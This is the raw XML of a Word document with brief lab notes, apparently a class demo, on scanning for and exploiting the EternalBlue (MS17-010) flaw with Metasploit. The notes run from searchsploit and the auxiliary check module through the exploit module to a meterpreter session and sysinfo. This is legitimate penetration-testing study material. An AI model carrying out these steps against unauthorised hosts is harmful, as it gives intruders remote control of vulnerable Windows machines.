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F1CA" w14:textId="70B62578" w:rsidR="00853ABF" w:rsidRPr="009C0D0F" w:rsidRDefault="007A2ACB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C0D0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Scanning </w:t>
      </w:r>
      <w:r w:rsidR="009C0D0F" w:rsidRPr="009C0D0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r w:rsidRPr="009C0D0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B56DFF4" w14:textId="77777777" w:rsidR="007A2ACB" w:rsidRDefault="007A2ACB"/>
    <w:p w14:paraId="2013BD45" w14:textId="284764D4" w:rsidR="009C0D0F" w:rsidRDefault="009C0D0F">
      <w:r>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240D2146" w14:textId="6D8BCF88" w:rsidR="009C0D0F" w:rsidRDefault="009C0D0F">
      <w:r>
        <w:t xml:space="preserve">Sudo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</w:p>
    <w:p w14:paraId="692ABE05" w14:textId="77777777" w:rsidR="009C0D0F" w:rsidRDefault="009C0D0F"/>
    <w:p w14:paraId="070F7765" w14:textId="74985556" w:rsidR="009C0D0F" w:rsidRDefault="009C0D0F">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eternalblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="35574068" w14:textId="14D3B46B" w:rsidR="009C0D0F" w:rsidRDefault="009C0D0F">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ms17-010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1E2A85" w14:textId="77777777" w:rsidR="009C0D0F" w:rsidRDefault="009C0D0F"/>
    <w:p w14:paraId="5876D391" w14:textId="583A8425" w:rsidR="009C0D0F" w:rsidRDefault="009C0D0F">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FEA743" w14:textId="3A4D8338" w:rsidR="009C0D0F" w:rsidRDefault="009C0D0F">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eternalblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="57A35175" w14:textId="5EDA483D" w:rsidR="009C0D0F" w:rsidRDefault="009C0D0F">
      <w:r>
        <w:t>Use(auxiliary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEC784E" w14:textId="4B553F21" w:rsidR="009C0D0F" w:rsidRDefault="009C0D0F">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4277AF" w14:textId="5C31C4E6" w:rsidR="009C0D0F" w:rsidRDefault="009C0D0F">
      <w:r>
        <w:t xml:space="preserve">Set RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="621E5710" w14:textId="092D3C92" w:rsidR="009C0D0F" w:rsidRDefault="009C0D0F">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A2D668" w14:textId="7E5CDC42" w:rsidR="009C0D0F" w:rsidRDefault="009C0D0F">
      <w:r>
        <w:t xml:space="preserve"># it </w:t>
      </w:r>
      <w:r w:rsidR="006463B7">
        <w:t>shows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that host is vulnerable or not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC9DF37" w14:textId="77777777" w:rsidR="009C0D0F" w:rsidRDefault="009C0D0F"/>
    <w:p w14:paraId="6BC8FB9C" w14:textId="42F2E486" w:rsidR="006463B7" w:rsidRDefault="006463B7" w:rsidP="006463B7">
      <w:r>
        <w:t>Use(</w:t>
      </w:r>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B72B776" w14:textId="77777777" w:rsidR="006463B7" w:rsidRDefault="006463B7" w:rsidP="006463B7">
      <w:r>
        <w:t xml:space="preserve">Set RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="70FB030C" w14:textId="68B0CFA1" w:rsidR="006463B7" w:rsidRDefault="006463B7" w:rsidP="006463B7">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571589C4" w14:textId="3154CB1F" w:rsidR="006463B7" w:rsidRDefault="006463B7" w:rsidP="006463B7">
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26294910" w14:textId="688202F4" w:rsidR="006463B7" w:rsidRDefault="006463B7" w:rsidP="006463B7">
      <w:r>
        <w:t xml:space="preserve"># The target is exploited and we get </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B2FEA1" w14:textId="77777777" w:rsidR="006463B7" w:rsidRDefault="006463B7" w:rsidP="006463B7"/>
    <w:p w14:paraId="4729AE65" w14:textId="08C08900" w:rsidR="006463B7" w:rsidRDefault="00B75AFA" w:rsidP="006463B7">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB0483D" w14:textId="77777777" w:rsidR="00B75AFA" w:rsidRDefault="00B75AFA" w:rsidP="006463B7"/>
    <w:p w14:paraId="7D82558B" w14:textId="77777777" w:rsidR="009C0D0F" w:rsidRDefault="009C0D0F"/>
    <w:p w14:paraId="3B05B8E7" w14:textId="77777777" w:rsidR="009C0D0F" w:rsidRDefault="009C0D0F"/>
    <w:p w14:paraId="72DEC716" w14:textId="77777777" w:rsidR="007A2ACB" w:rsidRDefault="007A2ACB"/>
    <w:sectPr w:rsidR="007A2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AB"/>
    <w:rsid w:val="002648BF"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="006463B7"/>
    <w:rsid w:val="007A2ACB"/>
    <w:rsid w:val="00835E88"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="009C0D0F"/>
    <w:rsid w:val="00AD59AB"/>
    <w:rsid w:val="00B7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771F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B9571C8D-3D61-415D-B124-76D6DF02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</Words>
  <Characters>344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2025-10-27T10:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-28T05:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>